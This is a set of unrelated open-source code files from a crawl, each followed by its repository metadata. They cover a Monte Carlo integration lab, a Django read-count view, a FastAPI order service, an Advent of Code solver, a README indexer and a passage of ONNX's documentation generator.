    print >> sys.stderr, "Outlier cases saved to `{}`".format(casesfw.name)
    casesfw.close()
    print >> sys.stderr, "Read count details saved to `{}`"\
        .format(detailsfw.name)
    detailsfw.close()
    summary.to_csv(reportfile, sep="\t", index=False, float_format="%d")
    print >> sys.stderr, "Summary report written to `{}` (# samples={})"\
        .format(reportfile, summary.shape[0])
    print >> sys.stderr, "Summary: n_prerisk={}, n_risk={}, n_carrier={}, n_affected_loci={}"\
        .format(total_prerisk, total_risk, total_carrier, total_loci)
| humanlongevity/tredparse | tredparse/tredreport.py | tredreport.py | py | 9,762 | python | en | code | 22 | github-code | 13 |
73755944339 | import random as rnd
#
# x0 = 1 #входные числа x0 и y0
# y0 = 2
#
# r0 = 5 #радиус окружности
#
# # ExpNmb = int(input("Напишите нужное количество экспериментов: ")) #ДЛЯ ЗАДАНИЯ 1
#
# def CALC_PI(x0, y0, r0, ExpNmb):
# m = 0 # обнуляем количество положителяных экспериментов
#
# xmin = x0 - r0
# xmax = x0 + r0
#
# ymin = y0 - r0
# ymax = y0 + r0
#
# for i in range(ExpNmb):
# p = rnd.random()
# xp = (xmax - xmin) * p + xmin
#
# p = rnd.random()
# yp = (ymax - ymin) * p + ymin
#
# if (xp - x0) ** 2 + (yp - y0) ** 2 < r0 ** 2:
# m += 1
#
# pi = (m / ExpNmb) * 4
# return pi
#
#
# ExpNmb = 10**4 # ДЛЯ ЗАДАНИЯ 2 ПУНКТ 1, 2, 3
#
#
# # print(f" число пи: {CALC_PI(x0, y0, r0, ExpNmb)}") # ДЛЯ ЗАДАНИЯ 1 И ЗАДАНИЯ ДВА (ЧАСТЬ 1)
#
#
# # ДЛЯ ЗАДАНИЯ 2 ПУНКТ 2 И ПУНКТ 3
#
# def SERIA(ExpNmb):
# SERIA_test = []
#
# for i in range(5):
# SERIA_test.append(CALC_PI(x0, y0, r0, ExpNmb))
# ExpNmb = ExpNmb * 10
#
# return SERIA_test
#
#
# # ДЛЯ ЗАДАНИЯ 2 ПУНКТ 2 И 3
#
# SERIA_1 = SERIA(ExpNmb)
# SERIA_2 = SERIA(ExpNmb)
# SERIA_3 = SERIA(ExpNmb)
# SERIA_4 = SERIA(ExpNmb)
# SERIA_5 = SERIA(ExpNmb)
#
# # ДЛЯ ЗАДАНИЯ 2 ПУНКТ 2 И 3 вывод
#
# # print(f"SERIA_1: {SERIA_1}")
# # print(f"SERIA_2: {SERIA_2}")
# # print(f"SERIA_3: {SERIA_3}")
# # print(f"SERIA_4: {SERIA_4}")
# # print(f"SERIA_5: {SERIA_5}")
#
# # ЗАДАНИЕ 3 ПУНКТ 1
#
# def CALC_EPS(SERIA):
# Eps = []
#
# for i in range(len(SERIA)):
# Epsi = abs((SERIA[i] - 3.1415926535) / 3.1415926535)
# Eps.append(Epsi)
#
# return Eps
#
# Eps1 = CALC_EPS(SERIA_1)
# Eps2 = CALC_EPS(SERIA_2)
# Eps3 = CALC_EPS(SERIA_3)
# Eps4 = CALC_EPS(SERIA_4)
# Eps5 = CALC_EPS(SERIA_5)
#
# # ЗАДАНИЕ 3 ПУНКТ 1 ВЫВОД
#
# # print(f"погрешность для 1й серии экспериментов: {Eps1}")
# # print(f"погрешность для 2й серии экспериментов: {Eps2}")
# # print(f"погрешность для 3й серии экспериментов: {Eps3}")
# # print(f"погрешность для 4й серии экспериментов: {Eps4}")
# # print(f"погрешность для 5й серии экспериментов: {Eps5}")
#
#
# # ЗАДАНИЕ 3 ПУНКТ 2 И 3
#
# def CALC_EPS_S_e(i):
# S_e = (SERIA_1[i] + SERIA_2[i] + SERIA_3[i] + SERIA_4[i] + SERIA_5[i]) / 5
#
# Eps_S_e = abs((S_e - 3.1415926535) / 3.1415926535)
#
# return Eps_S_e
#
# # ЗАДАНИЕ 3 ПУНКТ 2 И 3 ВЫВОД
#
# print(CALC_EPS_S_e(0)) # EPS_S_e4 (ExpNmb = 10**4)
# print(CALC_EPS_S_e(1)) # EPS_S_e5 (ExpNmb = 10**5)
# print(CALC_EPS_S_e(2)) # EPS_S_e6 (ExpNmb = 10**6)
# print(CALC_EPS_S_e(3)) # EPS_S_e7 (ExpNmb = 10**7)
# print(CALC_EPS_S_e(4)) # EPS_S_e8 (ExpNmb = 10**8)
# ЗАДАНИЕ 4 ПУНКТ 2 (ПУНКТ 1 ЯВЛЯЕТСЯ ТЕОРИЕЙ)
a = 0  # integration lower bound
b = 2  # integration upper bound
f_b = b ** 3 + 1  # max of f(x) = x^3 + 1 on [a, b] (f is increasing)
ExpNmb_ = 10**4  # base number of Monte Carlo samples
def CALC_INTEGRAL(a, b, f_b, ExpNmb_):
    """Monte Carlo estimate of the integral of x**3 + 1 over [a, b].

    Throws ExpNmb_ uniform random points into the rectangle
    [a, b] x [0, f_b] and scales the hit fraction by the rectangle area
    (assumes 0 <= x**3 + 1 <= f_b on the interval).
    """
    hits = 0
    for _ in range(ExpNmb_):
        x = (b - a) * rnd.random() + a
        y = f_b * rnd.random()
        if x ** 3 + 1 > y:
            hits += 1
    return (hits / ExpNmb_) * (b - a) * f_b
print(f" Интеграл: {CALC_INTEGRAL(a, b, f_b, ExpNmb_)}")
# ЗАДАНИЕ 4 ПУНКТ 3 (СОЗДАНИЕ ПЯТИ ВЕКТОРОВ VEK_INT) (КАК В ЗАДАНИИ 2)
def VEK_INT(ExpNmb_):
    # Build a series of 5 integral estimates, multiplying the sample count
    # by 10 each round (ExpNmb_, 10*ExpNmb_, ..., 10**4 * ExpNmb_).
    # NOTE: relies on the module globals a, b, f_b for the bounds.
    VEK_INT_test = []
    for i in range(5):
        VEK_INT_test.append(CALC_INTEGRAL(a, b, f_b, ExpNmb_))
        ExpNmb_ = ExpNmb_ * 10
    return VEK_INT_test
# Five independent series of estimates (each covers n = 1e4 .. 1e8 samples).
VEK_INT_1 = VEK_INT(ExpNmb_)
VEK_INT_2 = VEK_INT(ExpNmb_)
VEK_INT_3 = VEK_INT(ExpNmb_)
VEK_INT_4 = VEK_INT(ExpNmb_)
VEK_INT_5 = VEK_INT(ExpNmb_)
# print(f"VEK_INT_1: {VEK_INT_1}")
# print(f"VEK_INT_2: {VEK_INT_2}")
# print(f"VEK_INT_3: {VEK_INT_3}")
# print(f"VEK_INT_4: {VEK_INT_4}")
# print(f"VEK_INT_5: {VEK_INT_5}")
# РАСЧЕТ ПОГРЕШНОСТИ (КАК В ЗАДАНИИ 3 ПУНКТ 1)
def CALC_EPS_VEK(VEK_INT):
    """Relative error of each estimate against the exact integral value 6."""
    return [abs((estimate - 6) / 6) for estimate in VEK_INT]
# Per-series relative errors at each sample count.
Eps_VEK_1 = CALC_EPS_VEK(VEK_INT_1)
Eps_VEK_2 = CALC_EPS_VEK(VEK_INT_2)
Eps_VEK_3 = CALC_EPS_VEK(VEK_INT_3)
Eps_VEK_4 = CALC_EPS_VEK(VEK_INT_4)
Eps_VEK_5 = CALC_EPS_VEK(VEK_INT_5)
# print(f"погрешность для 1й серии экспериментов: {Eps_VEK_1}")
# print(f"погрешность для 2й серии экспериментов: {Eps_VEK_2}")
# print(f"погрешность для 3й серии экспериментов: {Eps_VEK_3}")
# print(f"погрешность для 4й серии экспериментов: {Eps_VEK_4}")
# print(f"погрешность для 5й серии экспериментов: {Eps_VEK_5}")
# РАСЧЕТ ПОГРЕШНОСТИ (КАК В ЗАДАНИИ 3 ПУНКТ 2 и 3)
def CALC_EPS_S_e_VEK(i):
    # Relative error of the MEAN of the i-th estimate across the five series
    # (exact value of the integral is 6). Reads globals VEK_INT_1..VEK_INT_5.
    S_e_VEK = (VEK_INT_1[i] + VEK_INT_2[i] + VEK_INT_3[i] + VEK_INT_4[i] + VEK_INT_5[i]) / 5
    Eps_S_e_VEK = abs((S_e_VEK - 6) / 6)
    return Eps_S_e_VEK
# Averaged-series error for each sample count.
print(CALC_EPS_S_e_VEK(0)) # EPS_S_e4 (ExpNmb = 10**4)
print(CALC_EPS_S_e_VEK(1)) # EPS_S_e5 (ExpNmb = 10**5)
print(CALC_EPS_S_e_VEK(2)) # EPS_S_e6 (ExpNmb = 10**6)
print(CALC_EPS_S_e_VEK(3)) # EPS_S_e7 (ExpNmb = 10**7)
print(CALC_EPS_S_e_VEK(4)) # EPS_S_e8 (ExpNmb = 10**8)
| AdastroAgni/Modeling_Of_Systems | lab_1/main.py | main.py | py | 5,805 | python | ru | code | 0 | github-code | 13 |
20273919398 | from django.shortcuts import render
from django.contrib.contenttypes.models import ContentType
from .models import ReadDetail
from blog.models import Blog
import datetime
import pytz
# Create your views here.
def get_week_data(request):
    """Render 'data.html' with per-day Blog read counts for the last 7 days.

    Context: 'days' — "M-DD"-style labels, oldest first; 'read_num' — the
    matching ReadDetail counts.
    """
    now = datetime.datetime.now()
    tz = pytz.timezone('Asia/Shanghai')
    # Bug fix: pytz zones must be attached via localize(); passing the zone
    # as tzinfo= uses its raw LMT offset (+08:06 for Asia/Shanghai), which
    # silently shifts every day boundary by 6 minutes.
    now_day = tz.localize(datetime.datetime(now.year, now.month, now.day, 0, 0))
    days = []
    days_str = []
    counts = []
    ct = ContentType.objects.get_for_model(Blog)
    # 拼装日期 — the seven day-start boundaries, oldest first.
    for n in range(7, 0, -1):
        day = now_day - datetime.timedelta(n)
        days.append(day)
    # 拼装每日阅读数 — one count per [day, day+1) window.
    for day in days:
        count = ReadDetail.objects.filter(content_type=ct, requested_at__range=(day, day+datetime.timedelta(1))).count()
        counts.append(count)
        day_str = str(day)[6:10]  # slice of the ISO string, e.g. "5-12"
        days_str.append(day_str)
    context = {
        'read_num': counts,
        'days': days_str,
    }
    return render(request, 'data.html', context=context)
74653480657 | from fastapi import HTTPException
from starlette import status
from api.schemas.common import Pagination
from api.schemas.order import (
CreateOrder,
CreateOrderItem,
CreateOrderResponse,
Order,
OrderItem,
OrderRequest,
)
from api.schemas.product import Product
from api.schemas.user import User
from repositories.orders import OrderRepository
from services.common import CommonService
from services.products import ProductService
from services.users import UserService
class OrderService(CommonService):
    """Order business logic: building Order objects from create requests
    and filtered/paginated listing on top of OrderRepository."""
    _model = Order
    _repository = OrderRepository
    _create_model = CreateOrder
    _create_response_model = CreateOrderResponse
    _verbose_name = 'order'
    @classmethod
    async def create_order(cls, create_order: CreateOrder) -> Order | None:
        """Resolve user and products, price each line and return the Order
        (in-memory only; persistence is not done here)."""
        user = await cls.valid_user(create_order)
        items: [OrderItem] = []
        total: float = 0.0
        order_dict = {'user_id': user.id, 'user_name': user.name}
        for item in create_order.items:
            product = await cls.valid_product(item)
            # An explicit item price overrides the catalog price.
            price = item.price if item.price else product.price
            amount = price * item.quantity
            valid_item = OrderItem(
                product_id=product.id,
                product_name=product.name,
                quantity=item.quantity,
                price=price,
                amount=amount,
            )
            total += amount
            items.append(valid_item)
        order_dict['items'] = items
        order_dict['total'] = total
        result = Order(**order_dict)
        return result
    @classmethod
    async def valid_user(cls, create_order: CreateOrder) -> User:
        """Look up the order's user by id or login name; 400 when neither given."""
        if create_order.user_id:
            return await UserService.get_by_id(create_order.user_id)
        elif create_order.user_name:
            return await UserService.get_by_field('login', create_order.user_name)
        else:
            raise HTTPException(status_code=400, detail='user_id or user_name must be non null')
    @classmethod
    async def valid_product(cls, product: CreateOrderItem) -> Product:
        """Look up an item's product by id or name; 400 when neither given."""
        if product.product_id:
            return await ProductService.get_by_id(product.product_id)
        elif product.product_name:
            return await ProductService.get_by_field('name', product.product_name)
        else:
            raise HTTPException(
                status_code=status.HTTP_400_BAD_REQUEST,
                detail='product_id or product_name must be not null',
            )
    @classmethod
    async def get_custom(
        cls, pagination: Pagination, params: OrderRequest
    ) -> tuple[int, int, list[_model]]:
        """Build a Mongo-style query from the optional request filters and
        return (page, limit, matching orders)."""
        # order_request = {'time': 167803456, 'user_name': 'Alex', 'sort_by': 'time', 'sorting': 'desc'}
        query = {}
        if params.user_name:
            query.update({'user_name': params.user_name})
        if params.user_id:
            query.update({'user_id': params.user_id})
        if params.product_id:
            query.update({'items.product_id': params.product_id})
        if params.product_name:
            query.update({'items.product_name': params.product_name})
        if params.date_from:
            query.update({'created': {'$gte': params.date_from}})
        if params.date_to:
            query.update({'created': {'$lte': params.date_to}})
        result = cls._repository.get_custom_list(
            pagination, query=query, sort_by=str(params.sort_by.value), sorting=params.sorting
        )
        return pagination.page, pagination.limit, result
| SergueiMoscow/MongoDB_study | services/orders.py | orders.py | py | 3,534 | python | en | code | 0 | github-code | 13 |
25288273270 | #!/usr/bin/env python3
from collections import namedtuple
# One parsed console instruction, e.g. Instruction('jmp', -3).
Instruction = namedtuple('Instruction', ('operation', 'argument'))
def run_program(program, force_jmp=None, force_nop=None):
    """Execute the handheld-console program (AoC 2020 day 8).

    Stops before any instruction would run a second time (infinite loop)
    and returns the accumulator at that point (part 1). If the pointer
    runs past the end of the program instead, prints and returns the
    accumulator (part 2's success case).

    force_jmp / force_nop: index of one instruction to execute as 'jmp'
    or 'nop' regardless of its actual operation — used to probe which
    single corrupted instruction makes the program terminate.
    """
    index = 0
    acc = 0
    visited = set()
    while index not in visited:
        visited.add(index)
        try:
            instruction = program[index]
        except IndexError:
            # Ran off the end: normal termination.
            print(f'Answer part 2: {acc}')
            return acc
        if force_jmp == index:
            index += instruction.argument
        elif force_nop == index:
            index += 1
        elif instruction.operation == 'nop':
            index += 1
        elif instruction.operation == 'acc':
            acc += instruction.argument
            index += 1
        elif instruction.operation == 'jmp':
            index += instruction.argument
    # Loop detected: accumulator value just before the repeat.
    return acc
if __name__ == '__main__':
    # Parse "op arg" lines from the puzzle input.
    program = []
    with open('input_8.txt') as f:
        for line in f:
            operation, argument = line.strip().split()
            program.append(Instruction(operation, int(argument)))
    print('Answer part 1: {}'.format(run_program(program)))
    # Part 2: try flipping each nop->jmp and jmp->nop; run_program prints
    # the answer itself when a variant terminates normally.
    nops = []
    jmps = []
    for index, instruction in enumerate(program):
        if instruction.operation == 'nop':
            nops.append(index)
        elif instruction.operation == 'jmp':
            jmps.append(index)
    for nop in nops:
        run_program(program, force_jmp=nop)
    for jmp in jmps:
        run_program(program, force_nop=jmp)
| erijpkema/advent_of_code_2020 | day8.py | day8.py | py | 1,494 | python | en | code | 0 | github-code | 13 |
40571368391 | #!/bin/env python3
# Este script cria o índice das dicas no README.
import os
import os.path
import re
from typing import Dict, List, Tuple
def obtem_topicos() -> Dict[str, List[Tuple]]:
    """Scan the current directory for topic folders and return
    {dir_name: [(md_filename, first_heading_title), ...]}, both sorted.

    Hidden directories are skipped; every .md file must start with a
    '# Title' line, otherwise ValueError is raised.
    """
    topicos: Dict[str, List[Tuple]] = {}
    for item_dir in sorted(os.listdir(".")):
        if not os.path.isdir(item_dir):
            continue
        if item_dir.startswith("."):
            continue
        if item_dir not in topicos:
            topicos[item_dir] = []
        for item_file in sorted(os.listdir(item_dir)):
            path = os.path.join(item_dir, item_file)
            if not os.path.isfile(path):
                continue
            if not item_file.endswith(".md"):
                continue
            # The first line of each tip must be its markdown title.
            with open(path) as fp:
                line = fp.readline().strip()
                m = re.match(r"# (.+)$", line)
                if m:
                    title = m.group(1)
                else:
                    raise ValueError("título inválido para {}".format(path))
            topicos[item_dir].append((item_file, title))
    return topicos
def atualiza_readme(topicos: Dict[str, List[Tuple]]) -> None:
    """Reescreve o README.md com o índice de dicas agrupadas por tópico."""
    linhas: List[str] = [
        "# tips\n",
        "\n",
        "Este repositório contém algumas dicas de atalhos e tarefas específicas,\n",
        "registradas para não se perderem no esquecimento.\n",
        "\n",
    ]
    for topico, dicas in topicos.items():
        linhas.append("## {}\n".format(topico))
        linhas.append("\n")
        for arquivo, titulo in dicas:
            linhas.append(f"* [{titulo}]({topico}/{arquivo})\n")
        linhas.append("\n")
    with open("README.md", "w") as fp:
        fp.writelines(linhas)
if __name__ == "__main__":
topicos = obtem_topicos()
atualiza_readme(topicos)
| zanardo/tips | index.py | index.py | py | 1,822 | python | pt | code | 0 | github-code | 13 |
22035974505 | #
# @lc app=leetcode.cn id=337 lang=python3
#
# [337] 打家劫舍 III
#
from typing import List, Optional
from collections import deque
from leetcode_tool import *
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def rob(self, root: "Optional[TreeNode]") -> int:
        """Return the maximum sum of node values such that no two chosen
        nodes are directly connected (parent/child).

        Bug fix: the previous implementation summed alternating BFS levels
        and took the larger level sum, which is wrong — the optimal choice
        may mix levels (e.g. for the chain 4-1-2-3 the answer is 4+3 = 7,
        but max(level sums) is only 6; the file's own test() asserts 7).
        This version does a post-order DFS returning, for each subtree, the
        pair (best if this node is robbed, best if it is skipped).
        """
        def best(node):
            if node is None:
                return 0, 0
            left = best(node.left)
            right = best(node.right)
            # Rob this node: both children must be skipped.
            robbed = node.val + left[1] + right[1]
            # Skip this node: each child may independently be robbed or not.
            skipped = max(left) + max(right)
            return robbed, skipped

        return max(best(root))
# @lc code=end
def test():
    # Regression cases; expected values are the true house-robber optima.
    # `create_tree` (from leetcode_tool) builds a tree from a level-order
    # list with None gaps.
    assert Solution().rob(create_tree([3, 2, 3, None, 3, None, 1])) == 7
    assert Solution().rob(create_tree([3, 4, 5, 1, 3, None, 1])) == 9
    assert Solution().rob(create_tree([4, 1, None, 2, None, 3])) == 7
| revang/leetcode | 337.打家劫舍-iii.py | 337.打家劫舍-iii.py | py | 1,350 | python | en | code | 0 | github-code | 13 |
71473261137 | import os
from collections import defaultdict
from typing import Any, Dict, List, NamedTuple, Sequence, Set, Tuple
import numpy as np
from onnx import defs, helper
from onnx.backend.sample.ops import collect_sample_implementations
from onnx.backend.test.case import collect_snippets
from onnx.defs import ONNX_ML_DOMAIN, OpSchema
# Example snippets and sample implementations harvested from the test cases;
# rendered under each operator's "Examples" / "Sample Implementation" section.
SNIPPETS = collect_snippets()
SAMPLE_IMPLEMENTATIONS = collect_sample_implementations()
# ML ops are included unless the ONNX_ML env var is explicitly "0".
ONNX_ML = not bool(os.getenv("ONNX_ML") == "0")
def display_number(v: int) -> str:
    """Render a min/max arity as text, using the infinity sign for unbounded."""
    return "∞" if defs.OpSchema.is_infinite(v) else str(v)
def should_render_domain(domain: str, output: str) -> bool:
    """ML-domain ops go only into the '-ml' output file; all other domains
    go only into the plain output file."""
    wants_ml = "-ml" in output
    return wants_ml if domain == ONNX_ML_DOMAIN else not wants_ml
def format_name_with_domain(domain: str, schema_name: str) -> str:
    """Qualify an op name with its domain; '' means the default operator set."""
    return f"{domain}.{schema_name}" if domain else schema_name
def format_function_versions(function_versions: Sequence[int]) -> str:
    """Comma-join opset versions, e.g. [1, 13] -> '1, 13'."""
    return ", ".join(str(version) for version in function_versions)
def format_versions(versions: Sequence[OpSchema], changelog: str) -> str:
    """Comma-join changelog links for each schema version, newest first."""
    links = [
        display_version_link(
            format_name_with_domain(v.domain, v.name), v.since_version, changelog
        )
        for v in reversed(versions)
    ]
    return ", ".join(links)
def display_attr_type(v: OpSchema.AttrType) -> str:
    """Humanize an AttrType member, e.g. AttrType.FLOATS -> 'list of floats'."""
    assert isinstance(v, OpSchema.AttrType)
    # Keep only the enum member name ('AttrType.INTS' -> 'ints').
    name = str(v).rpartition(".")[2].lower()
    # A plural member name means the attribute holds a list of that type.
    return "list of " + name if name.endswith("s") else name
def display_domain(domain: str) -> str:
    """Long-form description of an operator-set domain."""
    if not domain:
        return "the default ONNX operator set"
    return f"the '{domain}' operator set"
def display_domain_short(domain: str) -> str:
    """Short label for a domain; the empty domain is the default one."""
    return domain if domain else "ai.onnx (default)"
def display_version_link(name: str, version: int, changelog: str) -> str:
    """HTML link to the '<name>-<version>' anchor inside the changelog file."""
    anchor = f"{name}-{version}"
    return f'<a href="{changelog}#{anchor}">{version}</a>'
def generate_formal_parameter_tags(formal_parameter: OpSchema.FormalParameter) -> str:
    """Render the parenthesized tag list for a formal parameter, e.g.
    ' (optional, differentiable)'; returns '' when there are no tags."""
    tags: List[str] = []
    option = formal_parameter.option
    if option == OpSchema.FormalParameterOption.Optional:
        tags.append("optional")
    elif option == OpSchema.FormalParameterOption.Variadic:
        tags.append("variadic")
        if not formal_parameter.is_homogeneous:
            tags.append("heterogeneous")
    category = formal_parameter.differentiation_category
    if category == OpSchema.DifferentiationCategory.Differentiable:
        tags.append("differentiable")
    elif category == OpSchema.DifferentiationCategory.NonDifferentiable:
        tags.append("non-differentiable")
    return "" if not tags else " (" + ", ".join(tags) + ")"
def display_schema(
    schema: OpSchema, versions: Sequence[OpSchema], changelog: str
) -> str:
    """Render one operator schema as a markdown fragment: doc text, version
    info, then (unless deprecated) attributes, inputs, outputs and type
    constraints, with links into the changelog file."""
    s = ""
    # doc
    if schema.doc:
        s += "\n"
        s += "\n".join(
            (" " + line).rstrip() for line in schema.doc.lstrip().splitlines()
        )
        s += "\n"
    # since version
    s += "\n#### Version\n"
    if schema.support_level == OpSchema.SupportType.EXPERIMENTAL:
        s += "\nNo versioning maintained for experimental ops."
    else:
        s += (
            "\nThis version of the operator has been "
            + ("deprecated" if schema.deprecated else "available")
            + f" since version {schema.since_version}"
        )
        s += f" of {display_domain(schema.domain)}.\n"
        if len(versions) > 1:
            # TODO: link to the Changelog.md
            s += "\nOther versions of this operator: {}\n".format(
                ", ".join(
                    display_version_link(
                        format_name_with_domain(v.domain, v.name),
                        v.since_version,
                        changelog,
                    )
                    for v in versions[:-1]
                )
            )
    # If this schema is deprecated, don't display any of the following sections
    if schema.deprecated:
        return s
    # attributes
    if schema.attributes:
        s += "\n#### Attributes\n\n"
        s += "<dl>\n"
        for _, attr in sorted(schema.attributes.items()):
            # option holds either required or default value
            opt = ""
            if attr.required:
                opt = "required"
            elif attr.default_value.name:
                default_value = helper.get_attribute_value(attr.default_value)
                doc_string = attr.default_value.doc_string

                def format_value(value: Any) -> str:
                    # Floats get rounded; very long reprs fall back to
                    # scientific notation; bytes are decoded as UTF-8.
                    if isinstance(value, float):
                        formatted = str(np.round(value, 5))
                        # use default formatting, unless too long.
                        if len(formatted) > 10:  # noqa: PLR2004
                            formatted = str(f"({value:e})")
                        return formatted
                    if isinstance(value, (bytes, bytearray)):
                        return str(value.decode("utf-8"))
                    return str(value)

                if isinstance(default_value, list):
                    default_value = [format_value(val) for val in default_value]
                else:
                    default_value = format_value(default_value)
                opt = f"default is {default_value}{doc_string}"
            s += f"<dt><tt>{attr.name}</tt> : {display_attr_type(attr.type)}{f' ({opt})' if opt else ''}</dt>\n"
            s += f"<dd>{attr.description}</dd>\n"
        s += "</dl>\n"
    # inputs
    s += "\n#### Inputs"
    if schema.min_input != schema.max_input:
        s += f" ({display_number(schema.min_input)} - {display_number(schema.max_input)})"
    s += "\n\n"
    if schema.inputs:
        s += "<dl>\n"
        for input_ in schema.inputs:
            option_str = generate_formal_parameter_tags(input_)
            s += f"<dt><tt>{input_.name}</tt>{option_str} : {input_.type_str}</dt>\n"
            s += f"<dd>{input_.description}</dd>\n"
        s += "</dl>\n"
    # outputs
    s += "\n#### Outputs"
    if schema.min_output != schema.max_output:
        s += f" ({display_number(schema.min_output)} - {display_number(schema.max_output)})"
    s += "\n\n"
    if schema.outputs:
        s += "<dl>\n"
        for output in schema.outputs:
            option_str = generate_formal_parameter_tags(output)
            s += f"<dt><tt>{output.name}</tt>{option_str} : {output.type_str}</dt>\n"
            s += f"<dd>{output.description}</dd>\n"
        s += "</dl>\n"
    # type constraints
    s += "\n#### Type Constraints"
    s += "\n\n"
    if schema.type_constraints:
        s += "<dl>\n"
        for type_constraint in schema.type_constraints:
            allowedTypes = type_constraint.allowed_type_strs
            # NOTE(review): if the FIRST constraint had an empty
            # allowed_type_strs list, allowedTypeStr would be unbound below
            # (NameError); presumably every constraint has >= 1 type.
            if len(allowedTypes) > 0:
                allowedTypeStr = allowedTypes[0]
                for allowedType in allowedTypes[1:]:
                    allowedTypeStr += ", " + allowedType
            s += f"<dt><tt>{type_constraint.type_param_str}</tt> : {allowedTypeStr}</dt>\n"
            s += f"<dd>{type_constraint.description}</dd>\n"
        s += "</dl>\n"
    # Function Body
    # TODO: this should be refactored to show the function body graph's picture (DAG).
    # if schema.has_function or schema.has_context_dependent_function:  # type: ignore
    #     s += '\n#### Function\n'
    #     s += '\nThe Function can be represented as a function.\n'
    return s
def support_level_str(level: OpSchema.SupportType) -> str:
    """Prefix shown before experimental ops; empty for stable ops."""
    if level == OpSchema.SupportType.EXPERIMENTAL:
        return "<sub>experimental</sub> "
    return ""
class Args(NamedTuple):
    """Generator configuration: operator-doc filename and changelog filename."""
    output: str
    changelog: str
def main(args: Args) -> None:
    """Write the operator changelog and operator reference markdown files
    under <repo>/docs, based on all registered op schemas."""
    # gen_doc.py lives at onnx/defs/; three dirname() calls reach the repo root.
    base_dir = os.path.dirname(
        os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
    )
    docs_dir = os.path.join(base_dir, "docs")
    with open(
        os.path.join(docs_dir, args.changelog), "w", newline="", encoding="utf-8"
    ) as fout:
        fout.write("<!--- SPDX-License-Identifier: Apache-2.0 -->\n")
        fout.write("## Operator Changelog\n")
        fout.write(
            "*This file is automatically generated from the\n"
            " [def files](/onnx/defs) via [this script](/onnx/defs/gen_doc.py).\n"
            " Do not modify directly and instead edit operator definitions.*\n"
            "\n"
            "For an operator input/output's differentiability, it can be differentiable,\n"
            " non-differentiable, or undefined. If a variable's differentiability\n"
            " is not specified, that variable has undefined differentiability.\n"
        )
        # domain -> version -> [schema]
        dv_index: Dict[str, Dict[int, List[OpSchema]]] = defaultdict(
            lambda: defaultdict(list)
        )
        for schema in defs.get_all_schemas_with_history():
            dv_index[schema.domain][schema.since_version].append(schema)
        fout.write("\n")
        # One changelog section per domain, ordered by version then op name.
        for domain, versionmap in sorted(dv_index.items()):
            if not should_render_domain(domain, args.output):
                continue
            s = f"# {display_domain_short(domain)}\n"
            for version, unsorted_schemas in sorted(versionmap.items()):
                s += f"## Version {version} of {display_domain(domain)}\n"
                for schema in sorted(unsorted_schemas, key=lambda s: s.name):
                    name_with_ver = f"{format_name_with_domain(domain, schema.name)}-{schema.since_version}"
                    s += (
                        '### <a name="{}"></a>**{}**'
                        + (" (deprecated)" if schema.deprecated else "")
                        + "</a>\n"
                    ).format(name_with_ver, name_with_ver)
                    s += display_schema(schema, [schema], args.changelog)
                    s += "\n"
            fout.write(s)
    with open(
        os.path.join(docs_dir, args.output), "w", newline="", encoding="utf-8"
    ) as fout:
        fout.write("<!--- SPDX-License-Identifier: Apache-2.0 -->\n")
        fout.write("## Operator Schemas\n")
        fout.write(
            "*This file is automatically generated from the\n"
            " [def files](/onnx/defs) via [this script](/onnx/defs/gen_doc.py).\n"
            " Do not modify directly and instead edit operator definitions.*\n"
            "\n"
            "For an operator input/output's differentiability, it can be differentiable,\n"
            " non-differentiable, or undefined. If a variable's differentiability\n"
            " is not specified, that variable has undefined differentiability.\n"
        )
        # domain -> support level -> name -> [schema]
        index: Dict[str, Dict[int, Dict[str, List[OpSchema]]]] = defaultdict(
            lambda: defaultdict(lambda: defaultdict(list))
        )
        for schema in defs.get_all_schemas_with_history():
            index[schema.domain][int(schema.support_level)][schema.name].append(schema)
        fout.write("\n")
        # Preprocess the Operator Schemas
        # [(domain, [(support_level, [(schema name, current schema, all versions schemas)])])]
        operator_schemas: List[
            Tuple[str, List[Tuple[int, List[Tuple[str, OpSchema, List[OpSchema]]]]]]
        ] = []
        existing_ops: Set[str] = set()
        for domain, _supportmap in sorted(index.items()):
            if not should_render_domain(domain, args.output):
                continue
            processed_supportmap = []
            for _support, _namemap in sorted(_supportmap.items()):
                processed_namemap = []
                for n, unsorted_versions in sorted(_namemap.items()):
                    # The last element after the sort is the current schema.
                    versions = sorted(unsorted_versions, key=lambda s: s.since_version)
                    schema = versions[-1]
                    if schema.name in existing_ops:
                        continue
                    existing_ops.add(schema.name)
                    processed_namemap.append((n, schema, versions))
                processed_supportmap.append((_support, processed_namemap))
            operator_schemas.append((domain, processed_supportmap))
        # Table of contents
        for domain, supportmap in operator_schemas:
            s = f"### {display_domain_short(domain)}\n"
            fout.write(s)
            fout.write("|**Operator**|**Since version**||\n")
            fout.write("|-|-|-|\n")
            function_ops = []
            for _, namemap in supportmap:
                for n, schema, versions in namemap:
                    # Function ops are deferred to their own sub-table below.
                    if schema.has_function or schema.has_context_dependent_function:  # type: ignore
                        function_versions = schema.all_function_opset_versions  # type: ignore
                        function_ops.append((n, schema, versions, function_versions))
                        continue
                    s = '|{}<a href="#{}">{}</a>{}|{}|\n'.format(
                        support_level_str(schema.support_level),
                        format_name_with_domain(domain, n),
                        format_name_with_domain(domain, n),
                        " (deprecated)" if schema.deprecated else "",
                        format_versions(versions, args.changelog),
                    )
                    fout.write(s)
            if function_ops:
                fout.write("|**Function**|**Since version**|**Function version**|\n")
                for n, schema, versions, function_versions in function_ops:
                    s = '|{}<a href="#{}">{}</a>|{}|{}|\n'.format(
                        support_level_str(schema.support_level),
                        format_name_with_domain(domain, n),
                        format_name_with_domain(domain, n),
                        format_versions(versions, args.changelog),
                        format_function_versions(function_versions),
                    )
                    fout.write(s)
            fout.write("\n")
        fout.write("\n")
        # Detail section: full schema rendering plus examples and samples.
        for domain, supportmap in operator_schemas:
            s = f"## {display_domain_short(domain)}\n"
            fout.write(s)
            for _, namemap in supportmap:
                for op_type, schema, versions in namemap:
                    # op_type
                    s = (
                        '### {}<a name="{}"></a><a name="{}">**{}**'
                        + (" (deprecated)" if schema.deprecated else "")
                        + "</a>\n"
                    ).format(
                        support_level_str(schema.support_level),
                        format_name_with_domain(domain, op_type),
                        format_name_with_domain(domain, op_type.lower()),
                        format_name_with_domain(domain, op_type),
                    )
                    s += display_schema(schema, versions, args.changelog)
                    s += "\n\n"
                    if op_type in SNIPPETS:
                        s += "#### Examples\n\n"
